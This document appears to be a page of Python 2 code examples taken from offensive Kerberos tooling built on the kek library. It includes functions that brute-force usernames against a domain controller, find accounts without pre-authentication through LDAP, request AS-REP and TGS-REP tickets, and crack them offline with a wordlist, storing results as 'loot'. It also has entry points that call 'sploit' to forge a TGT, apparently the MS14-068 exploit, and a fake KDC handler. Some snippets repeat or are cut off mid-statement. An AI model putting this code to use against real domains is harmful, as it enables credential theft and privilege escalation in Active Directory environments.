Example #1
0
    def do_net_get_tgs_rep(self, line):
	try:
            user_key = (RC4_HMAC, ntlm_hash(krbTricks.set_arg['password']).digest())
            krbTricks.set_arg['target_service']
        except:
            krbTricks.bad_cmd(self, 'net_get_tgs_rep')
            return
        if len(line) >= 3:
            pkt, plaintext_password = line.split(' ', 1)
            user_key = (RC4_HMAC, ntlm_hash(plaintext_password).digest())
            crack_tgs_rep(user_key, pkt, plaintext_password)
        elif 'domain' in krbTricks.set_arg and 'username' in krbTricks.set_arg and 'dc' in krbTricks.set_arg:
            try:
                net_get_user_sid(krbTricks.set_arg['dc'], krbTricks.set_arg['username'], krbTricks.set_arg['domain'] , krbTricks.set_arg['password'], krbTricks.set_arg['username'])
                target_service = target_host = kdc_b = None
                user_realm = krbTricks.set_arg['domain']
                user_name = krbTricks.set_arg['username']
                target_realm = krbTricks.set_arg['domain']
                user_sid = krbTricks.set_arg['user_sid']
                target_service = "krbtgt"
                kdc_a = krbTricks.set_arg['dc']
                krbTricks.set_arg['pre'] = True
                net_get_tgs_rep(user_realm, user_name, user_sid, user_key, kdc_a, target_realm, target_service, target_host, krbtgt_a_key=None, trust_ab_key=None, target_key=None)
                target_service,target_realm = krbTricks.set_arg['target_service'].split('/')
                net_get_tgs_rep(user_realm, user_name, user_sid, user_key, kdc_a, target_realm, target_service, target_host, krbtgt_a_key=None, trust_ab_key=None, target_key=None)
                #net_get_tgs_rep(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_service, target_host)
                krbTricks.set_arg['pre'] = False
            except:
                print(' Uh-oh, something went wrong :(')
                return
        else:
            krbTricks.bad_cmd(self, 'net_get_tgs_rep')
            return
Example #2
0
    def do_net_get_as_rep(self, line):
        # todo dont apend if user exists
        krbTricks.set_arg['pre'] = False
        if 'domain' in krbTricks.set_arg and 'username' in krbTricks.set_arg and 'dc' in krbTricks.set_arg:
            if 'pre' in krbTricks.set_arg and 'password' in krbTricks.set_arg and 'user_sid' in krbTricks.set_arg:
                if krbTricks.set_arg['pre'] == True:
                    krbTricks.set_arg['padata_type'] = 2
                    user_key = (RC4_HMAC, ntlm_hash(krbTricks.set_arg['password']).digest())
                    user_sid = krbTricks.set_arg['user_sid']
                else:
                    krbTricks.set_arg['padata_type'] = 149
                    user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
                    user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
            else:
                krbTricks.set_arg['padata_type'] = 149
                user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
                user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
            user_realm = krbTricks.set_arg['domain']
            user_name = krbTricks.set_arg['username']
            kdc_a = krbTricks.set_arg['dc']
            try:
                padata_type = krbTricks.set_arg['padata_type']
                net_get_as_rep(user_realm, user_name, user_sid, user_key, kdc_a)
                rep = decoder.decode(krbTricks.set_arg['net_krbas'].decode('hex'))[0]
                #print rep
                if rep[1] == 11:
                    print "  [+] Got a valid AS-REP for %s... Done!" % user_name
                    krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt', 'krbas':krbTricks.set_arg['net_krbas']})
                if rep[4] == 25:
                    print "  [-] Invalid AS-REP for %s... " % user_name
                    print "  [+] Got a valid user name (%s)... Done!" % user_name
                    krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt' })
                if rep[4] == 18:
                    print "  [-] Invalid AS-REP for %s... " % user_name
                    print "  [+] %s locked... Done!" % user_name
                    krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt' })
                if rep[4] == 6:
                    print "  [-] Not a valid user name (%s)... " % user_name
                    # principal unknown i.e. not a user
                    #krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'krbas':krbTricks.set_arg['net_krbas']})
                krbTricks.set_arg['padata_type'] = ''
    #            print "\n #\tAS-REP\tUser"
    #           for idx, accts in enumerate(krbTricks.loot):
    #               if 'krbas' in accts:
    #                   gotasrep = 'Yes'
    #               else:
    #                   gotasrep = 'No'
    #               print "[%d]\t%s\t%s@%s" % (idx, gotasrep, accts['user_name'], accts['domain'])
    #               gotasrep = 'No'
                show('users')
            except:
                print(' Uh-oh, something went wrong :(')
                return


        else:
            krbTricks.bad_cmd(self, 'net_get_as_rep')
            return
Example #3
0
    def do_crack_as_rep_manual(self, line):
        if 'krbas' in krbTricks.loot[int(line)] and "wordlist" in krbTricks.set_arg:
            words = [f.rstrip('\n') for f in open(krbTricks.set_arg['wordlist'])]
            for word in words:
                user_key = (RC4_HMAC, ntlm_hash(word).digest())
                if crack_as_rep(user_key, krbTricks.loot[int(line)]['krbas'], word):
                    krbTricks.loot[int(line)]['password'] = word
                    break
#        else:
#            krbTricks.bad_cmd(self, 'crack_as_rep_manual')
#            return
        show('users')
Example #4
0
    def do_crack_tgs_rep(self, line):
        for idx, accts in enumerate(krbTricks.loot):
            if 'krbtgs' in accts and "wordlist" in krbTricks.set_arg and 'password' not in krbTricks.loot[idx]:
               print " Trying to crack %s" % accts['user_name']
               words = [f.rstrip('\n') for f in open(krbTricks.set_arg['wordlist'])]
               for word in words:
                   user_key = (RC4_HMAC, ntlm_hash(word).digest())
                   if crack_tgs_rep(user_key, accts['krbtgs'], word):
                       krbTricks.loot[idx]['password'] = word
                       break
#            else:
#               krbTricks.bad_cmd(self, 'do_crack_tgs_rep')
#               return
        show('users')
Example #5
0
    def do_brute_no_pre_auth(self, line):
        krbTricks.set_arg['pre'] = False
	try:
            words = [f.rstrip('\n') for f in open(krbTricks.set_arg['userlist'])]
        except:
            krbTricks.bad_cmd(self, 'brute_no_pre_auth')
            return

        for user_name in words:
            if 'domain' in krbTricks.set_arg and 'dc' in krbTricks.set_arg:
                if next((item for item in krbTricks.loot if item["user_name"] == user_name), None):
                    print ""
                else:
                    krbTricks.set_arg['padata_type'] = 149
                    user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
                    user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
                    user_realm = krbTricks.set_arg['domain']
                    kdc_a = krbTricks.set_arg['dc']
                    padata_type = krbTricks.set_arg['padata_type']
                    try:
                        net_get_as_rep(user_realm, user_name, user_sid, user_key, kdc_a)
                        
                    except:
			print(' can\'t send data to the DC ?\n')
                        return
                    try:
                        krbTricks.set_arg['padata_type'] = ''
                        rep = decoder.decode(krbTricks.set_arg['net_krbas'].decode('hex'))[0]
                        #if user_name not in enuberate(krbTricks.loot):
                        if rep[1] == 11:
                            krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt', 'krbas':krbTricks.set_arg['net_krbas']})
                        if rep[4] == 25:
                            krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt'})
                        if rep[4] == 18:
                            krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt'})
                        #if rep[4] == 6:
                            # principal unknown i.e. not a user
                            #krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'krbas':krbTricks.set_arg['net_krbas']})
                    except:
                        print('  [+] Decoding AS-REP from dc.onlyfor.hax... No Ticket\n')

            else:
                krbTricks.bad_cmd(self, 'brute_no_pre_auth')
                return

        show('users')
Example #6
0
        print >> sys.stderr, '    -p <clearPassword>'
        print >> sys.stderr, ' --rc4 <ntlmHash>'
        sys.exit(1)

    opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4='])
    opts = dict(opts)
    if not all(k in opts for k in ('-u', '-s', '-d')):
        usage_and_exit()

    user_name, user_realm = opts['-u'].split('@', 1)
    user_sid = opts['-s']
    kdc_a = opts['-d']

    if '--rc4' in opts:
        user_key = (RC4_HMAC, opts['--rc4'].decode('hex'))
        assert len(user_key[1]) == 16
    elif '-p' in opts:
        user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest())
    else:
        user_key = (RC4_HMAC, ntlm_hash(getpass('Password: '******'TGT_%s@%s.ccache' % (user_name, user_realm)

    user_realm = user_realm.upper()
    target_realm = target_realm.upper()

    sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b,
           target_realm, target_service, target_host, filename)
Example #7
0
def handleAsReq(data):
    req = decode(data, asn1Spec=AsReq())[0]
    realm = str(req['req-body']['realm'])
    nonce = int(req['req-body']['nonce'])

    # Check if it has pre-auth; if not, send error
    preAuthData = None
    if req['padata'] != None:
       for padata in req['padata']:
           if padata['padata-type'] == 2:
               preAuthData = str(padata['padata-value'])
               preAuthData = decode(preAuthData, asn1Spec=EncryptedData())[0]
               preAuthData = str(preAuthData['cipher'])
               break

    if preAuthData == None:
        gt, ms = epoch2gt(time(), microseconds=True)
        rep = KrbError()
        rep['pvno'] = 5
        rep['msg-type'] = 30
        rep['stime'] = gt
        rep['susec'] = ms
        rep['error-code'] = 25
        rep['crealm'] = realm
        rep['cname'] = None
        rep['cname']['name-type'] = int(req['req-body']['cname']['name-type'])
        rep['cname']['name-string'] = None
        rep['cname']['name-string'][0] = str(req['req-body']['cname']['name-string'][0])
        rep['realm'] = realm
        rep['sname'] = None
        rep['sname']['name-type'] = int(req['req-body']['sname']['name-type'])
        rep['sname']['name-string'] = None
        rep['sname']['name-string'][0] = str(req['req-body']['sname']['name-string'][0])
        rep['sname']['name-string'][1] = str(req['req-body']['sname']['name-string'][1])
        rep['e-text'] = 'Need to use PA-ENC-TIMESTAMP/PA-PK-AS-REQ'
        rep['e-data'] = binascii.unhexlify('30613009a103020110a20204003009a10302010fa20204003009a103020102a2020400300aa1040202008aa2020400300aa10402020088a20204003012a10302010ba20b040930073005a0030201173012a103020113a20b040930073005a003020117')

        print "Replying with pre-auth required"
        return encode(rep)

    # Try to decode preAuthData with valid pws
    preAuthIsValid = False
    preAuthIsValidPw = None
    for pw in valid_pws:
        try:
            decrypted = decrypt(RC4_HMAC, ntlm_hash(pw).digest(), 1, preAuthData)
            preAuthIsValid = True
            preAuthIsValidPw = (RC4_HMAC, ntlm_hash(pw).digest())
        except: pass

    print "Is using a valid pre-auth password: %s" % preAuthIsValid

    sname = (str(req['req-body']['sname']['name-string'][0]), str(req['req-body']['sname']['name-string'][1]))
    if (sname[0] == 'kadmin' and sname[1] == 'changepw'):

        rep = buildAsRep(req, USER_EXP_KEY)
        print "Replying with AS response for kadmin/changepw"

    else:

        if preAuthIsValid:
            rep = buildAsRep(req, preAuthIsValidPw)
            print "Replying with normal AS-REP"

        else:

            gt, ms = epoch2gt(time(), microseconds=True)
            rep = KrbError()
            rep['pvno'] = 5
            rep['msg-type'] = 30
            rep['stime'] = gt
            rep['susec'] = ms
            rep['error-code'] = 23
            rep['crealm'] = realm
            rep['cname'] = None
            rep['cname']['name-type'] = int(req['req-body']['cname']['name-type'])
            rep['cname']['name-string'] = None
            rep['cname']['name-string'][0] = str(req['req-body']['cname']['name-string'][0])
            rep['realm'] = realm
            rep['sname'] = None
            rep['sname']['name-type'] = int(req['req-body']['sname']['name-type'])
            rep['sname']['name-string'] = None
            rep['sname']['name-string'][0] = str(req['req-body']['sname']['name-string'][0])
            rep['sname']['name-string'][1] = str(req['req-body']['sname']['name-string'][1])

            print "Replying with password expired error"

    return encode(rep)
Example #8
0
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import protocol, reactor, endpoints

from pyasn1.codec.der.encoder import encode
from pyasn1.codec.der.decoder import decode
from pyasn1.type.char import GeneralString
from pyasn1.type.univ import Integer, Sequence, SequenceOf, OctetString, BitString, Boolean
from pyasn1.type.namedtype import NamedTypes, NamedType, OptionalNamedType

from kek.krb5 import _c, application, AsReq, APReq, Authenticator, KerberosTime, Realm, PrincipalName, AsRep, NT_PRINCIPAL, NT_SRV_INST, EncTicketPart, EncASRepPart, EncryptedData, HostAddress, Microseconds, EncryptionKey, TgsReq, EncTGSRepPart, TgsRep
from kek.util import epoch2gt, gt2epoch
from kek.crypto import RC4_HMAC, encrypt, decrypt, ntlm_hash

KRBTGT_KEY = (RC4_HMAC, binascii.unhexlify('0468cebdfc8a86e2578dca9406309611'))
USER_EXP_KEY = (RC4_HMAC, ntlm_hash('a').digest())

class KrbError(Sequence):
    tagSet = application(30)
    componentType = NamedTypes(
        NamedType('pvno', _c(0, Integer())),
        NamedType('msg-type', _c(1, Integer())),
        OptionalNamedType('ctime', _c(2, KerberosTime())),
        OptionalNamedType('cusec', _c(3, Integer())),
        NamedType('stime', _c(4, KerberosTime())),
        NamedType('susec', _c(5, Integer())),
        NamedType('error-code', _c(6, Integer())),
        OptionalNamedType('crealm', _c(7, Realm())),
        OptionalNamedType('cname', _c(8, PrincipalName())),
        NamedType('realm', _c(9, Realm())),
        NamedType('sname', _c(10, PrincipalName())),
        print >> sys.stderr, 'OPTIONS:'
        print >> sys.stderr, '    -p <clearPassword>'
        print >> sys.stderr, ' --rc4 <ntlmHash>'
        sys.exit(1)
 
    opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4='])
    opts = dict(opts)
    if not all(k in opts for k in ('-u', '-s', '-d')):
        usage_and_exit()
 
    user_name, user_realm = opts['-u'].split('@', 1)
    user_sid = opts['-s']
    kdc_a = opts['-d']
 
    if '--rc4' in opts:
        user_key = (RC4_HMAC, opts['--rc4'].decode('hex'))
        assert len(user_key[1]) == 16
    elif '-p' in opts:
        user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest())
    else:
        user_key = (RC4_HMAC, ntlm_hash(getpass('Password: '******'TGT_%s@%s.ccache' % (user_name, user_realm)
 
    user_realm = user_realm.upper()
    target_realm = target_realm.upper()
 
    sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
Example #10
0
def handleAsReq(data):
    req = decode(data, asn1Spec=AsReq())[0]
    realm = str(req['req-body']['realm'])
    nonce = int(req['req-body']['nonce'])

    # Check if it has pre-auth; if not, send error
    preAuthData = None
    if req['padata'] != None:
        for padata in req['padata']:
            if padata['padata-type'] == 2:
                preAuthData = str(padata['padata-value'])
                preAuthData = decode(preAuthData, asn1Spec=EncryptedData())[0]
                preAuthData = str(preAuthData['cipher'])
                break

    if preAuthData == None:
        gt, ms = epoch2gt(time(), microseconds=True)
        rep = KrbError()
        rep['pvno'] = 5
        rep['msg-type'] = 30
        rep['stime'] = gt
        rep['susec'] = ms
        rep['error-code'] = 25
        rep['crealm'] = realm
        rep['cname'] = None
        rep['cname']['name-type'] = int(req['req-body']['cname']['name-type'])
        rep['cname']['name-string'] = None
        rep['cname']['name-string'][0] = str(
            req['req-body']['cname']['name-string'][0])
        rep['realm'] = realm
        rep['sname'] = None
        rep['sname']['name-type'] = int(req['req-body']['sname']['name-type'])
        rep['sname']['name-string'] = None
        rep['sname']['name-string'][0] = str(
            req['req-body']['sname']['name-string'][0])
        rep['sname']['name-string'][1] = str(
            req['req-body']['sname']['name-string'][1])
        rep['e-text'] = 'Need to use PA-ENC-TIMESTAMP/PA-PK-AS-REQ'
        rep['e-data'] = binascii.unhexlify(
            '30613009a103020110a20204003009a10302010fa20204003009a103020102a2020400300aa1040202008aa2020400300aa10402020088a20204003012a10302010ba20b040930073005a0030201173012a103020113a20b040930073005a003020117'
        )

        print "Replying with pre-auth required"
        return encode(rep)

    # Try to decode preAuthData with valid pws
    preAuthIsValid = False
    preAuthIsValidPw = None
    for pw in valid_pws:
        try:
            decrypted = decrypt(RC4_HMAC,
                                ntlm_hash(pw).digest(), 1, preAuthData)
            preAuthIsValid = True
            preAuthIsValidPw = (RC4_HMAC, ntlm_hash(pw).digest())
        except:
            pass

    print "Is using a valid pre-auth password: %s" % preAuthIsValid

    sname = (str(req['req-body']['sname']['name-string'][0]),
             str(req['req-body']['sname']['name-string'][1]))
    if (sname[0] == 'kadmin' and sname[1] == 'changepw'):

        rep = buildAsRep(req, USER_EXP_KEY)
        print "Replying with AS response for kadmin/changepw"

    else:

        if preAuthIsValid:
            rep = buildAsRep(req, preAuthIsValidPw)
            print "Replying with normal AS-REP"

        else:

            gt, ms = epoch2gt(time(), microseconds=True)
            rep = KrbError()
            rep['pvno'] = 5
            rep['msg-type'] = 30
            rep['stime'] = gt
            rep['susec'] = ms
            rep['error-code'] = 23
            rep['crealm'] = realm
            rep['cname'] = None
            rep['cname']['name-type'] = int(
                req['req-body']['cname']['name-type'])
            rep['cname']['name-string'] = None
            rep['cname']['name-string'][0] = str(
                req['req-body']['cname']['name-string'][0])
            rep['realm'] = realm
            rep['sname'] = None
            rep['sname']['name-type'] = int(
                req['req-body']['sname']['name-type'])
            rep['sname']['name-string'] = None
            rep['sname']['name-string'][0] = str(
                req['req-body']['sname']['name-string'][0])
            rep['sname']['name-string'][1] = str(
                req['req-body']['sname']['name-string'][1])

            print "Replying with password expired error"

    return encode(rep)
Example #11
0
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import protocol, reactor, endpoints

from pyasn1.codec.der.encoder import encode
from pyasn1.codec.der.decoder import decode
from pyasn1.type.char import GeneralString
from pyasn1.type.univ import Integer, Sequence, SequenceOf, OctetString, BitString, Boolean
from pyasn1.type.namedtype import NamedTypes, NamedType, OptionalNamedType

from kek.krb5 import _c, application, AsReq, APReq, Authenticator, KerberosTime, Realm, PrincipalName, AsRep, NT_PRINCIPAL, NT_SRV_INST, EncTicketPart, EncASRepPart, EncryptedData, HostAddress, Microseconds, EncryptionKey, TgsReq, EncTGSRepPart, TgsRep
from kek.util import epoch2gt, gt2epoch
from kek.crypto import RC4_HMAC, encrypt, decrypt, ntlm_hash

KRBTGT_KEY = (RC4_HMAC, binascii.unhexlify('0468cebdfc8a86e2578dca9406309611'))
USER_EXP_KEY = (RC4_HMAC, ntlm_hash('a').digest())


class KrbError(Sequence):
    tagSet = application(30)
    componentType = NamedTypes(
        NamedType('pvno', _c(0, Integer())),
        NamedType('msg-type', _c(1, Integer())),
        OptionalNamedType('ctime', _c(2, KerberosTime())),
        OptionalNamedType('cusec', _c(3, Integer())),
        NamedType('stime', _c(4, KerberosTime())),
        NamedType('susec', _c(5, Integer())),
        NamedType('error-code', _c(6, Integer())),
        OptionalNamedType('crealm', _c(7, Realm())),
        OptionalNamedType('cname', _c(8, PrincipalName())),
        NamedType('realm', _c(9, Realm())),
Example #12
0
        print >> sys.stderr, "OPTIONS:"
        print >> sys.stderr, "    -p <clearPassword>"
        print >> sys.stderr, " --rc4 <ntlmHash>"
        sys.exit(1)

    opts, args = getopt(sys.argv[1:], "u:s:d:p:", ["rc4="])
    opts = dict(opts)
    if not all(k in opts for k in ("-u", "-s", "-d")):
        usage_and_exit()

    user_name, user_realm = opts["-u"].split("@", 1)
    user_sid = opts["-s"]
    kdc_a = opts["-d"]

    if "--rc4" in opts:
        user_key = (RC4_HMAC, opts["--rc4"].decode("hex"))
        assert len(user_key[1]) == 16
    elif "-p" in opts:
        user_key = (RC4_HMAC, ntlm_hash(opts["-p"]).digest())
    else:
        user_key = (RC4_HMAC, ntlm_hash(getpass("Password: "******"TGT_%s@%s.ccache" % (user_name, user_realm)

    user_realm = user_realm.upper()
    target_realm = target_realm.upper()

    sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
Example #13
0
def scan_ldap_no_pre_auth(dc, bindusername, binddomain, bindpass):
# todo fix filter, currently static 
    binddn = bindusername+'@'+binddomain
    basedn = "cn=users"
    for d in binddomain.split('.'):
        basedn += ", dc="+d

    try:
        # Try and make a synchronous bind
        conn = ldap.open(dc)
        conn.simple_bind_s(binddn,bindpass)

        # Search information
        scope = ldap.SCOPE_SUBTREE

        filter = "(userAccountControl=4260352)"
        #attributes = ['sAMAccountName','memberOf' ]
        attributes = ['*' ]

        # Search! 
        result = conn.search_s( basedn, scope, filter, attributes )
        for r in result:
            print r[1]['sAMAccountName'][0]
            #print r[1]
            if 'primaryGroupID' in r[1]:
                print '  primaryGroupID = '+r[1]['primaryGroupID'][0] 
            if 'distinguishedName' in r[1]:
                print '  distinguishedName = '+r[1]['distinguishedName'][0] 
            if 'objectSid' in r[1]:
                objSid = r[1]['objectSid'][0]
                SRL = str(int(binascii.b2a_hex(objSid[0]), 16))
                SA = str(int(binascii.b2a_hex(objSid[1]), 16))
                IAV = str(int(binascii.b2a_hex(objSid[2:8]), 16))
                RIDa = str(int(binascii.b2a_hex(objSid[8:12][::-1]), 16))
                RIDb = str(int(binascii.b2a_hex(objSid[12:16][::-1]), 16))
                RIDc = str(int(binascii.b2a_hex(objSid[16:20][::-1]), 16))
                RIDd = str(int(binascii.b2a_hex(objSid[20:24][::-1]), 16))
                RIDe = str(int(binascii.b2a_hex(objSid[24:28][::-1]), 16))
                sid = 'S-'+SRL+'-'+IAV+'-'+RIDa+'-'+RIDb+'-'+RIDc+'-'+RIDd+'-'+RIDe
                print '  Sid = '+sid
                user_sid = sid
            else:
                user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
            if 'badPwdCount' in r[1]:
                print '  badPwdCount = '+r[1]['badPwdCount'][0] 
            if 'givenName' in r[1]:
                print '  givenName = '+r[1]['givenName'][0] 

            krbTricks.set_arg['pre'] = False
            user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
            try:
                net_get_as_rep(binddomain, r[1]['sAMAccountName'][0], user_sid, user_key, dc)
                rep = decoder.decode(krbTricks.set_arg['net_krbas'].decode('hex'))[0]
                if rep[1] == 11:
                    print "  [+] Got a valid AS-REP for %s... Done!" % r[1]['sAMAccountName'][0]
                    krbTricks.loot.append({'user_name':r[1]['sAMAccountName'][0], 'domain':binddomain, 'target_service':'krbtgt', 'krbas':krbTricks.set_arg['net_krbas']})
                if rep[4] == 25:
                    print "  [-] Invalid AS-REP for %s... " % r[1]['sAMAccountName'][0]
                    print "  [+] Got a valid user name (%s)... Done!" % r[1]['sAMAccountName'][0]
                    krbTricks.loot.append({'user_name':r[1]['sAMAccountName'][0], 'domain':binddomain, 'target_service':'krbtgt' })
                if rep[4] == 18:
                    print "  [-] Invalid AS-REP for %s... " % r[1]['sAMAccountName'][0]
                    print "  [+] %s locked... Done!" % r[1]['sAMAccountName'][0]
                    krbTricks.loot.append({'user_name':r[1]['sAMAccountName'][0], 'domain':binddomain, 'target_service':'krbtgt' })
                if rep[4] == 6:
                    print "  [-] Not a valid user name (%s)... " % r[1]['sAMAccountName'][0]
                    # principal unknown i.e. not a user
                krbTricks.set_arg['padata_type'] = ''

            except:
                print(' can\'t send data to the DC ?\n')
            #    return

        show('users')
    except ldap.LDAPError as e:
        print e
Example #14
0
        #print >> sys.stderr, '    -p <clearPassword>'
        #print >> sys.stderr, ' --rc4 <ntlmHash>'
        sys.exit(1)

    opts, args = getopt(sys.argv[1:], 'u:d:p:', ['rc4='])
    opts = dict(opts)
    if not all(k in opts for k in ('-u', '-d')):
        usage_and_exit()

    user_name, user_realm = opts['-u'].split('@', 1)
    #user_sid = opts['-s']
    kdc_a = opts['-d']

    if '--rc4' in opts:
        user_key = (RC4_HMAC, opts['--rc4'].decode('hex'))
        assert len(user_key[1]) == 16
    elif '-p' in opts:
        user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest())
    else:
        user_key = (RC4_HMAC, ntlm_hash(' ').digest())

    target_realm = user_realm
    target_service = target_host = kdc_b = None
    filename = 'TGT_%s@%s.ccache' % (user_name, user_realm)

    user_realm = user_realm.upper()
    target_realm = target_realm.upper()

    sploit(user_realm, user_name, user_key, kdc_a, kdc_b, target_realm,
           target_service, target_host, filename)